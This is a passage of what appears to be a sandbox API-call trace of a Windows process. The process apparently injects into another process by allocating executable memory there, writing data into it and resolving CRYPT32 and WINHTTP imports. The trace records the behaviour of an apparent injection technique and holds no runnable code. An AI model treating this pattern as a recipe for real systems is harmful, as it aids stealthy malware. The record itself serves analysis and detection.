BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.907] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.907] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.908] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.908] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.908] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.908] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.908] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.908] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.908] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.908] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.909] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.909] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.909] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.909] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.909] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.909] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.909] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.909] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.910] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.910] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.910] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.910] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.910] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.910] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.910] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.910] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.911] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.911] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.911] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.911] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949dc2, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="CRYPT32.dll") returned 12 [0140.911] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.911] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0140.911] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.911] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.911] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.912] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.912] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.912] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.912] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.915] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.915] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.915] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.915] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.915] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.915] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.915] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949dac*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949dac*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.915] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.915] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.916] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.916] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.916] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.916] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.916] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.916] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.916] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.917] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.917] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.917] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.917] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a068, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.917] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949eca, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="WINHTTP.dll") returned 12 [0140.917] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.917] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0140.917] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.917] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.918] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.918] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.918] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.918] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.918] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.923] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.923] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.923] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.923] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.923] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.923] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.923] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949df8*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949df8*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0140.923] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.924] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.924] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.924] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.924] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.924] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.924] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.924] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.925] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.925] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.925] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.925] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.925] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a1f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.925] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.925] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949dd0*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949dd0*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.925] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.926] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.926] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.926] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.926] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.926] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.926] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.927] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.927] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.927] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.927] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.927] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.927] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a200, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.927] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x32, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.927] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949e90*, NumberOfBytesToWrite=0x1a, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949e90*, NumberOfBytesWritten=0x28df88*=0x1a) returned 0x0 [0140.927] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.928] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.928] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.928] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.928] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.928] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.928] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.928] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.928] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.929] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.929] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2002a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.929] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.929] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a208, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.929] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, 